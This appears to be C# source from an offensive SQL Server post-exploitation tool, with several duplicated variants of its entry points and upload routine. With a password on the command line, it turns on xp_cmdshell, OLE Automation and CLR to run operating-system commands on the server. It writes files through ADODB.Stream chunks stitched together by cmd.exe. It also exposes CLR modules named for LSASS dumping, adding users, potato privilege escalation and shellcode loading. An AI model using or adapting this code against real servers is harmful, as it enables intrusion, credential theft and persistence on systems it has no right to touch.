/// <summary>
/// Entry point: an interactive "SQL> " loop over one connection built from the
/// three command-line arguments (presumably server, user, password, as in the
/// other entry points of this file). A fixed set of keywords is dispatched to
/// the Setting/FilesOptions/ExecOptions helpers; any other line is sent to the
/// server verbatim through Batch.RemoteExec.
/// </summary>
/// <param name="args">Exactly three arguments; anything else prints the usage and returns.</param>
static void Main(string[] args)
{
    if (3 != args.Length)
    {
        Info.ShowUsage();
        return;
    }

    // Whatever args[2] is (the password in the sibling entry points) sits in
    // argv, so it is visible to process listings and command-line auditing.
    var connection = SqlConnet(args[0], args[1], args[2]);
    var setting = new Setting(connection);
    var filesOptions = new FilesOptions(connection, setting);
    var execOptions = new ExecOptions(connection, setting);

    try
    {
        while (true)
        {
            Console.Write("SQL> ");
            string line = Console.ReadLine();
            // At EOF ReadLine() returns null and ToLower() throws; the catch
            // below then closes the connection and reports the message.
            string keyword = line.ToLower();
            if (keyword == "exit")
            {
                connection.Close();
                break;
            }
            if (keyword == "help")
            {
                Info.ShowModuleUsage();
                continue;
            }

            // Up to three pieces: verb, first argument, remainder of the line.
            string[] parts = line.Split(new char[] { ' ' }, 3);
            // Everything after the verb, each piece followed by a blank
            // (so the text carries a trailing space).
            string argText = string.Concat(parts.Skip(1).Select(p => p + " "));

            switch (parts[0].ToLower())
            {
                case "enable_xp_cmdshell":
                    setting.Enable_xp_cmdshell();
                    break;
                case "disable_xp_cmdshell":
                    setting.Disable_xp_cmdshell();
                    break;
                case "xp_cmdshell":
                    execOptions.xp_cmdshell(argText);
                    break;
                case "enable_ole":
                    setting.Enable_ola();
                    break;
                case "disable_ole":
                    setting.Disable_ole();
                    break;
                case "sp_cmdshell":
                    execOptions.sp_cmdshell(argText);
                    break;
                case "upload":
                    // Fewer than three pieces makes the indexer throw into the catch below.
                    filesOptions.UploadFiles(parts[1], parts[2]);
                    break;
                case "download":
                    // Note the swapped argument order compared with "upload".
                    filesOptions.DownloadFiles(parts[2], parts[1]);
                    break;
                default:
                    // Not a built-in verb: the raw line is executed as T-SQL.
                    Console.WriteLine(Batch.RemoteExec(connection, line, true));
                    break;
            }

            if (connection.State != ConnectionState.Open)
            {
                Console.WriteLine("[!] Disconnect....");
                break;
            }
        }
    }
    catch (Exception ex)
    {
        connection.Close();
        Console.WriteLine("[!] Error log: \r\n" + ex.Message);
    }
}
/// <summary>
/// One-shot mode: opens a connection to the master database from the first
/// three arguments, runs the single module named by the fourth (with the
/// remaining arguments as its parameters) and closes the connection. A module
/// name that is not recognised is executed as T-SQL text.
/// </summary>
/// <param name="args">target, user name, password, module, module arguments...</param>
static void Noninteractive(string[] args)
{
    if (args.Length < 4)
    {
        Help();
        return;
    }
    string target = args[0];
    string username = args[1];
    string password = args[2];
    string module = args[3];
    try
    {
        // Establish the SQL connection. The password is part of the process
        // command line, so it is exposed to process listings and command-line
        // auditing on the host this runs from.
        string connectionString = String.Format("Server = {0};Database = master;User ID = {1};Password = {2};", target, username, password);
        Conn = new SqlConnection(connectionString);
        Conn.InfoMessage += new SqlInfoMessageEventHandler(OnInfoMessage);
        Conn.Open();
        Console.WriteLine("[*] Database connection is successful!");
    }
    catch (Exception ex)
    {
        // A failed connection ends the whole process, and with exit code 0.
        Console.WriteLine("[!] Error log: \r\n" + ex.Message);
        Environment.Exit(0);
    }
    setting = new Setting(Conn);
    try
    {
        switch (module.ToLower())
        {
            case "enable_xp_cmdshell": setting.Enable_xp_cmdshell(); break;
            case "disable_xp_cmdshell": setting.Disable_xp_cmdshell(); break;
            case "xp_cmdshell":
                {
                    // Two or more trailing arguments are re-joined with a blank
                    // after each (trailing space included); exactly one is passed
                    // as-is; none at all makes args[4] throw into the catch below.
                    String command = String.Empty;
                    if (args.Length > 5)
                    {
                        for (int i = 4; i < args.Length; i++) { command += args[i] + " "; }
                    }
                    else
                    {
                        command = args[4];
                    }
                    xp_shell(command);
                    break;
                }
            case "sp_oacreate":
                {
                    // Same argument handling as xp_cmdshell; the extra inner
                    // block is redundant but harmless.
                    {
                        String command = String.Empty;
                        if (args.Length > 5)
                        {
                            for (int i = 4; i < args.Length; i++) { command += args[i] + " "; }
                        }
                        else
                        {
                            command = args[4];
                        }
                        sp_shell(command);
                        break;
                    }
                }
            case "upload": UploadFiles(args[4], args[5]); break;
            // Argument order is swapped relative to "upload".
            case "download": DownloadFiles(args[5], args[4]); break;
            case "enable_ole": setting.Enable_ola(); break;
            case "disable_ole": setting.Disable_ole(); break;
            // These take no parameters; the module name alone is sent to the CLR procedure.
            case "clr_dumplsass": clr_exec("clr_dumplsass"); break;
            case "clr_rdp": clr_exec("clr_rdp"); break;
            case "clr_getav": clr_exec("clr_getav"); break;
            // Each of the following forwards the module name and everything
            // after it (args[3..]) as one space-joined string.
            case "clr_adduser": { String s = String.Empty; for (int i = 3; i < args.Length; i++) { s += args[i] + " "; } clr_exec(s); break; }
            case "clr_scloader": { String s = String.Empty; for (int i = 3; i < args.Length; i++) { s += args[i] + " "; } clr_exec(s); break; }
            case "clr_scloader2": { String s = String.Empty; for (int i = 3; i < args.Length; i++) { s += args[i] + " "; } clr_exec(s); break; }
            case "clr_download": { String s = String.Empty; for (int i = 3; i < args.Length; i++) { s += args[i] + " "; } clr_exec(s); break; }
            case "enable_clr": setting.Enable_clr(); break;
            case "disable_clr": setting.Disable_clr(); break;
            case "install_clr":
                {
                    // Three server-side configuration steps through the Setting
                    // helper; the success message spells "crl".
                    setting.Set_permission_set();
                    setting.CREATE_ASSEMBLY();
                    setting.CREATE_PROCEDURE();
                    Console.WriteLine("[+] Install crl successful!");
                    break;
                }
            case "uninstall_clr": setting.drop_clr(); break;
            default:
                // Unknown module: the module text itself is run as T-SQL.
                Console.WriteLine(Batch.RemoteExec(Conn, args[3], true));
                break;
        }
        if (!ConnectionState.Open.Equals(Conn.State)) { Console.WriteLine("[!] Disconnect...."); }
        Conn.Close();
    }
    catch (Exception ex)
    {
        Conn.Close();
        Console.WriteLine("[!] Error log: \r\n" + ex.Message);
    }
}
/// <summary>
/// Runs an operating-system command on the server through xp_cmdshell and
/// prints whatever Batch.RemoteExec returns. Server-side, every call is an
/// xp_cmdshell execution, which is the event to watch for.
/// </summary>
/// <param name="Command">Command text; it is placed inside the single-quoted
/// T-SQL literal exactly as given.</param>
static void xp_shell(String Command)
{
    // The statement is kept in the shared sqlstr field, like the other helpers do.
    sqlstr = "exec master..xp_cmdshell '" + Command + "'";
    var output = Batch.RemoteExec(Conn, sqlstr, true);
    Console.WriteLine(output);
}
/// <summary>
/// Interactive mode: connects to the master database with the supplied
/// target/user/password, then reads commands from the console in a loop. A
/// fixed set of verbs is dispatched to the local helpers; any other line is
/// sent to the server unchanged as T-SQL. The loop ends on "exit", when the
/// connection is no longer open, or when a helper throws.
/// </summary>
/// <param name="args">args[0] target, args[1] user name, args[2] password.</param>
static void interactive(string[] args)
{
    string target = args[0];
    string username = args[1];
    string password = args[2];

    try
    {
        // Credentials arrive on the process command line, so they are visible
        // to anything that records argv on the operator's host.
        string connectionString =
            "Server = \"" + target + "\";Database = \"master\";User ID = \"" + username + "\";Password = \"" + password + "\";";
        Conn = new SqlConnection(connectionString);
        Conn.InfoMessage += OnInfoMessage;
        Conn.Open();
        Console.WriteLine("[*] Database connection is successful!");
    }
    catch (Exception ex)
    {
        // Connection failure terminates the whole process (exit code 0).
        Console.WriteLine("[!] Error log: \r\n" + ex.Message);
        Environment.Exit(0);
    }

    setting = new Setting(Conn);

    try
    {
        while (true)
        {
            Console.Write("SQL> ");
            string line = Console.ReadLine();
            // A null line (EOF) makes ToLower() throw; the catch below closes
            // the connection and reports the message.
            string lowered = line.ToLower();
            if (lowered == "exit")
            {
                Conn.Close();
                break;
            }
            if (lowered == "help")
            {
                Help();
                continue;
            }

            // verb, first argument, rest of the line
            string[] parts = line.Split(new char[] { ' ' }, 3);
            // Joins parts[start..] with a blank after each piece (trailing space kept).
            Func<int, string> joinFrom = start =>
            {
                string joined = String.Empty;
                for (int idx = start; idx < parts.Length; idx++)
                {
                    joined += parts[idx] + " ";
                }
                return joined;
            };
            string verb = parts[0].ToLower();

            switch (verb)
            {
                case "enable_xp_cmdshell":
                    setting.Enable_xp_cmdshell();
                    break;
                case "disable_xp_cmdshell":
                    setting.Disable_xp_cmdshell();
                    break;
                case "xp_cmdshell":
                    xp_shell(joinFrom(1));
                    break;
                case "sp_oacreate":
                    sp_shell(joinFrom(1));
                    break;
                case "upload":
                    // Fewer than three pieces makes the indexer throw into the catch below.
                    UploadFiles(parts[1], parts[2]);
                    break;
                case "download":
                    // Argument order is swapped relative to "upload".
                    DownloadFiles(parts[2], parts[1]);
                    break;
                case "enable_ole":
                    setting.Enable_ola();
                    break;
                case "disable_ole":
                    setting.Disable_ole();
                    break;
                case "clr_dumplsass":
                case "clr_rdp":
                case "clr_getav":
                    // The lower-cased verb is exactly the text the original passed.
                    clr_exec(verb);
                    break;
                case "clr_adduser":
                case "clr_scloader":
                case "clr_scloader2":
                case "clr_download":
                    // The whole line, verb included and in original case, is forwarded.
                    clr_exec(joinFrom(0));
                    break;
                case "enable_clr":
                    setting.Enable_clr();
                    break;
                case "disable_clr":
                    setting.Disable_clr();
                    break;
                case "install_clr":
                    setting.Set_permission_set();
                    setting.CREATE_ASSEMBLY();
                    setting.CREATE_PROCEDURE();
                    Console.WriteLine("[+] Install clr done.");
                    break;
                case "uninstall_clr":
                    setting.drop_clr();
                    break;
                default:
                    // Not a built-in verb: the raw line is executed as T-SQL.
                    Console.WriteLine(Batch.RemoteExec(Conn, line, true));
                    break;
            }

            if (Conn.State != ConnectionState.Open)
            {
                Console.WriteLine("[!] Disconnect....");
                break;
            }
        }
    }
    catch (Exception ex)
    {
        Conn.Close();
        Console.WriteLine("[!] Error log: \r\n" + ex.Message);
    }
}
/// <summary>
/// Uploads a local file to the server's file system through the OLE Automation
/// stored procedures: the file is hex-encoded, cut into pieces, each piece is
/// written with ADODB.Stream as "&lt;remoteFile&gt;_N.config_txt", and the pieces
/// are then joined with "copy /b" and deleted by a cmd.exe started through
/// wscript.shell. Server-side, the trail this leaves is the sp_OACreate /
/// sp_OAMethod calls, the chunk files, and a cmd.exe launched from inside the
/// SQL Server service process.
/// </summary>
/// <param name="localFile">Path of the file to read on this machine.</param>
/// <param name="remoteFile">Destination path on the server.</param>
static void UploadFiles(String localFile, String remoteFile)
{
    Console.WriteLine(String.Format("[*] Uploading '{0}' to '{1}'...", localFile, remoteFile));
    // Turns on "Ole Automation Procedures" when it is off and gives up when
    // Enable_ola() returns true. NOTE(review): the later variant of this
    // function in the file gives up on false instead — confirm the helper's
    // return convention.
    if (setting.Check_configuration("Ole Automation Procedures", 0))
    {
        if (setting.Enable_ola())
        {
            return;
        }
    }
    int count = 0;
    try
    {
        // Whole file as upper-case hex, then cut into 150000-character
        // (75000-byte) pieces.
        string hexString = string.Concat(File.ReadAllBytes(localFile).Select(b => b.ToString("X2")));
        ArrayList arrlist = GetSeparateSubString(hexString, 150000);
        foreach (string hex150000 in arrlist)
        {
            count++;
            // Piece N is written to "<remoteFile>_N.config_txt" (1-based).
            string filePath = String.Format("{0}_{1}.config_txt", remoteFile, count);
            // One ADODB.Stream per piece: Type 1 (presumably binary), write the
            // hex literal, SaveToFile with option 2 (presumably overwrite), then
            // destroy the object. sqlstr is the shared field.
            sqlstr = String.Format(@" DECLARE @ObjectToken INT EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT EXEC sp_OASetProperty @ObjectToken, 'Type', 1 EXEC sp_OAMethod @ObjectToken, 'Open' EXEC sp_OAMethod @ObjectToken, 'Write', NULL, 0x{0} EXEC sp_OAMethod @ObjectToken, 'SaveToFile', NULL,'{1}', 2 EXEC sp_OAMethod @ObjectToken, 'Close' EXEC sp_OADestroy @ObjectToken", hex150000, filePath);
            Batch.RemoteExec(Conn, sqlstr, false);
            if (setting.File_Exists(filePath, 1))
            {
                Console.WriteLine("[+] {0}-{1} Upload completed", arrlist.Count, count);
            }
            else
            {
                // Hard stop: pieces already written remain on the server,
                // because the cleanup further down never runs.
                Console.WriteLine("[!] {0}-{1} Error uploading", arrlist.Count, count);
                Conn.Close();
                Environment.Exit(0);
            }
            Thread.Sleep(5000);
        }
        // T-SQL prefix that runs cmd.exe through wscript.shell; the command
        // text appended to it must close the quote opened after "/c ".
        string shell = String.Format(@" DECLARE @SHELL INT EXEC sp_oacreate 'wscript.shell', @SHELL OUTPUT EXEC sp_oamethod @SHELL, 'run' , NULL, 'c:\windows\system32\cmd.exe /c ");
        // Builds: copy /b <remote>_1.config_txt+...+<remote>_N.config_txt <remote>'
        sqlstr = "copy /b ";
        for (int i = 1; i < count + 1; i++)
        {
            if (i != count)
            {
                sqlstr += String.Format(@"{0}_{1}.config_txt+", remoteFile, i);
            }
            else
            {
                sqlstr += String.Format(@"{0}_{1}.config_txt {0}'", remoteFile, i);
            }
        }
        Console.WriteLine(@"[+] copy /b {0}_x.config_txt {0}", remoteFile);
        Batch.RemoteExec(Conn, shell + sqlstr, false);
        Thread.Sleep(5000);
        // Deletes every *.config_txt in the destination directory, not only the
        // pieces written above. The directory is remoteFile with its file name
        // stripped off.
        sqlstr = String.Format(@"del {0}*.config_txt'", remoteFile.Replace(Path.GetFileName(remoteFile), ""));
        Console.WriteLine("[+] {0}", sqlstr.Replace("'", ""));
        Batch.RemoteExec(Conn, shell + sqlstr, false);
        if (setting.File_Exists(remoteFile, 1))
        {
            Console.WriteLine("[*] '{0}' Upload completed", localFile);
        }
    }
    catch (Exception ex)
    {
        Conn.Close();
        Console.WriteLine("[!] Error log: \r\n" + ex.Message);
    }
}
/// <summary>
/// Sends a command string to the dbo.ClrExec stored procedure (presumably the
/// one created by install_clr) through Batch.CLRExec. Nothing is printed here;
/// output handling is left to Batch.CLRExec.
/// </summary>
/// <param name="Command">Text placed inside the single-quoted T-SQL literal exactly as given.</param>
static void clr_exec(String Command)
{
    // Shared sqlstr field, as in the other helpers.
    sqlstr = "exec dbo.ClrExec '" + Command + "'";
    Batch.CLRExec(Conn, sqlstr);
}
/// <summary>
/// One-shot mode: connects with target/user/password to the named database,
/// runs the module named by args[4] with the remaining arguments as its
/// parameters, and closes the connection. Unrecognised module names fall
/// through to executing text as T-SQL.
/// </summary>
/// <param name="args">target[:port], user name, password, database, module, module arguments...</param>
static void Noninteractive(string[] args)
{
    if (args.Length < 4)
    {
        // NOTE(review): args[4] is read unconditionally below, so exactly four
        // arguments still fail with an index exception outside any try.
        Help();
        return;
    }
    string target = args[0];
    // "host:port" is rewritten to "host,port", the form used in the connection string.
    if (target.Contains(":"))
    {
        target = target.Replace(":", ",");
    }
    string username = args[1];
    string password = args[2];
    string database = args[3];
    string module = args[4];
    try
    {
        // Establish the SQL connection. The password sits in argv, so it is
        // visible to process listings and command-line auditing on this host.
        string connectionString = String.Format("Server = \"{0}\";Database = \"{1}\";User ID = \"{2}\";Password = \"{3}\";", target, database, username, password);
        Conn = new SqlConnection(connectionString);
        Conn.InfoMessage += new SqlInfoMessageEventHandler(OnInfoMessage);
        Conn.Open();
        Console.WriteLine("[*] Database connection is successful!");
    }
    catch (Exception ex)
    {
        // A failed connection ends the process, and with exit code 0.
        Console.WriteLine("[!] Error log: \r\n" + ex.Message);
        Environment.Exit(0);
    }
    setting = new Setting(Conn);
    try
    {
        switch (module.ToLower())
        {
            case "enable_xp_cmdshell": setting.Enable_xp_cmdshell(); break;
            case "disable_xp_cmdshell": setting.Disable_xp_cmdshell(); break;
            case "xp_cmdshell":
                {
                    // Two or more trailing arguments are re-joined with a blank
                    // after each (trailing space included); exactly one is passed
                    // as-is; none at all makes args[5] throw into the catch below.
                    String command = String.Empty;
                    if (args.Length > 6)
                    {
                        for (int i = 5; i < args.Length; i++) { command += args[i] + " "; }
                    }
                    else
                    {
                        command = args[5];
                    }
                    xp_shell(command);
                    break;
                }
            case "sp_oacreate":
                {
                    // Same argument handling as xp_cmdshell; the extra inner
                    // block is redundant but harmless.
                    {
                        String command = String.Empty;
                        if (args.Length > 6)
                        {
                            for (int i = 5; i < args.Length; i++) { command += args[i] + " "; }
                        }
                        else
                        {
                            command = args[5];
                        }
                        sp_shell(command);
                        break;
                    }
                }
            case "upload": UploadFiles(args[5], args[6]); break;
            // Argument order is swapped relative to "upload".
            case "download": DownloadFiles(args[6], args[5]); break;
            case "enable_ole": setting.Enable_ola(); break;
            case "disable_ole": setting.Disable_ole(); break;
            // Each of the following forwards the module name and everything
            // after it (args[4..]) as one space-joined string to clr_exec.
            case "clr_dumplsass": { String s = String.Empty; for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } clr_exec(s); break; }
            case "clr_ping": { String s = String.Empty; for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } clr_exec(s); break; }
            case "clr_cat": { String s = String.Empty; for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } clr_exec(s); break; }
            case "clr_ls": { String s = String.Empty; for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } clr_exec(s); break; }
            case "clr_cd": { String s = String.Empty; for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } clr_exec(s); break; }
            case "clr_rm": { String s = String.Empty; for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } clr_exec(s); break; }
            // These take no parameters; the module name alone is sent.
            case "clr_pwd": clr_exec("clr_pwd"); break;
            case "clr_netstat": clr_exec("clr_netstat"); break;
            case "clr_ps": clr_exec("clr_ps"); break;
            case "clr_rdp": clr_exec("clr_rdp"); break;
            case "clr_getav": clr_exec("clr_getav"); break;
            // Again module name plus trailing arguments, space-joined.
            case "clr_adduser": { String s = String.Empty; for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } clr_exec(s); break; }
            case "clr_exec": { String s = String.Empty; for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } clr_exec(s); break; }
            case "clr_efspotato": { String s = String.Empty; for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } clr_exec(s); break; }
            case "clr_badpotato": { String s = String.Empty; for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } clr_exec(s); break; }
            case "clr_scloader": { String s = String.Empty; for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } clr_exec(s); break; }
            case "clr_scloader1": { String s = String.Empty; for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } clr_exec(s); break; }
            case "clr_scloader2": { String s = String.Empty; for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } clr_exec(s); break; }
            case "clr_download": { String s = String.Empty; for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } clr_exec(s); break; }
            case "clr_combine": { String s = String.Empty; for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } clr_exec(s); break; }
            case "enable_clr": setting.Enable_clr(); break;
            case "disable_clr": setting.Disable_clr(); break;
            // Installation is delegated entirely to the Setting helper here.
            case "install_clr": { setting.install_clr(); break; }
            case "uninstall_clr": setting.drop_clr(); break;
            default:
                // NOTE(review): args[3] is the database name in this variant, not
                // the module text (args[4]); this looks like a stale index carried
                // over from the four-argument version — confirm which is intended.
                Console.WriteLine(Batch.RemoteExec(Conn, args[3], true));
                break;
        }
        if (!ConnectionState.Open.Equals(Conn.State)) { Console.WriteLine("[!] Disconnect...."); }
        Conn.Close();
    }
    catch (Exception ex)
    {
        Conn.Close();
        Console.WriteLine("[!] Error log: \r\n" + ex.Message);
    }
}
/// <summary>
/// Uploads a local file to the server's file system through the OLE Automation
/// stored procedures: the file bytes are cut into pieces, each piece is
/// hex-encoded and written with ADODB.Stream as "&lt;remoteFile&gt;_N.config_txt",
/// and the pieces are then joined with "copy /b" and deleted by a cmd.exe
/// started through wscript.shell. Server-side, the trail is the sp_OACreate /
/// sp_OAMethod calls, the chunk files, and a cmd.exe launched from inside the
/// SQL Server service process; "Ole Automation Procedures" stays enabled
/// afterwards (the disabling call at the end is commented out).
/// </summary>
/// <param name="localFile">Path of the file to read on this machine.</param>
/// <param name="remoteFile">Destination path on the server; nothing is done if it already exists.</param>
static void UploadFiles(String localFile, String remoteFile)
{
    Console.WriteLine(String.Format("[*] Uploading '{0}' to '{1}'...", localFile, remoteFile));
    // Turns on "Ole Automation Procedures" when it is off and gives up when
    // Enable_ola() returns false. NOTE(review): the earlier variant of this
    // function in the file gives up on true — confirm the helper's return convention.
    if (setting.Check_configuration("Ole Automation Procedures", 0) && !setting.Enable_ola())
    {
        return;
    }
    byte[] byteArray = ReadFileToByte(localFile);
    // Accumulates the "copy /b" command line while the pieces are written.
    string text = "copy /b ";
    if (setting.File_Exists(remoteFile, 1))
    {
        Console.WriteLine("[+] {0} Exists", remoteFile);
        return;
    }
    int num = 0;        // piece index (0-based file suffix)
    int num2 = 0;       // offset into byteArray of the next piece
    int splitLength = 250000;
    // Piece sizes in bytes, as decided by SplitFileSize.
    List<int> list = SplitFileSize(byteArray.Length, splitLength);
    try
    {
        foreach (int num3 in list)
        {
            // Piece file name uses num before it is incremented: "<remoteFile>_0.config_txt" first.
            string text2 = string.Format("{0}_{1}.config_txt", remoteFile, num);
            byte[] array = new byte[num3];
            Array.Copy(byteArray, num2, array, 0, num3);
            string hexstr = string.Concat(from b in array select b.ToString("X2"));
            // One ADODB.Stream per piece: Type 1 (presumably binary), write the
            // hex literal, SaveToFile with option 2 (presumably overwrite), then
            // destroy the object. sqlstr is the shared field.
            sqlstr = String.Format(@" DECLARE @ObjectToken INT EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT EXEC sp_OASetProperty @ObjectToken, 'Type', 1 EXEC sp_OAMethod @ObjectToken, 'Open' EXEC sp_OAMethod @ObjectToken, 'Write', NULL, 0x{0} EXEC sp_OAMethod @ObjectToken, 'SaveToFile', NULL,'{1}', 2 EXEC sp_OAMethod @ObjectToken, 'Close' EXEC sp_OADestroy @ObjectToken", hexstr, text2);
            Batch.RemoteExec(Conn, sqlstr, false);
            num2 += num3;
            num++;
            text = text + "\"" + text2 + "\"+";
            Thread.Sleep(1000);
            if (setting.File_Exists(text2, 1))
            {
                // NOTE(review): num was already incremented, so the suffix printed
                // here is one higher than the file that was actually written.
                Console.WriteLine("[+] {0}_{1}.config_txt Upload completed", remoteFile, num);
            }
            else
            {
                // Hard stop: pieces already written remain on the server, because
                // the cleanup further down never runs.
                Console.WriteLine("[!] {0}_{1}.config_txt Error uploading", remoteFile, num);
                Conn.Close();
                Environment.Exit(0);
            }
            Thread.Sleep(1000);
        }
        // Drop the dangling '+', append the destination, and close the T-SQL
        // string literal opened by the "shell" prefix below.
        text = text.Trim(new char[] { '+' }) + " \"" + remoteFile + "\"'";
        // T-SQL prefix that runs cmd.exe through wscript.shell; the command
        // text appended to it must close the quote opened after "/c ".
        string shell = String.Format(@" DECLARE @SHELL INT EXEC sp_oacreate 'wscript.shell', @SHELL OUTPUT EXEC sp_oamethod @SHELL, 'run' , NULL, 'c:\windows\system32\cmd.exe /c ");
        Console.WriteLine(@"[+] copy /b {0}_x.config_txt {0}", remoteFile);
        Batch.RemoteExec(Conn, shell + text, false);
        Thread.Sleep(1000);
        if (setting.File_Exists(remoteFile, 1))
        {
            // Deletes every *.config_txt in the destination directory, not only
            // the pieces written above. The directory is remoteFile with its
            // file name stripped off.
            sqlstr = String.Format(@"del {0}*.config_txt'", remoteFile.Replace(Path.GetFileName(remoteFile), ""));
            Console.WriteLine("[+] {0}", sqlstr.Replace("'", ""));
            Batch.RemoteExec(Conn, shell + sqlstr, false);
            Console.WriteLine("[*] '{0}' Upload completed", localFile);
        }
        // The server-side configuration change made at the top is not reverted.
        //setting.Disable_ole();
    }
    catch (Exception ex)
    {
        Conn.Close();
        Console.WriteLine("[!] Error log: \r\n" + ex.Message);
    }
}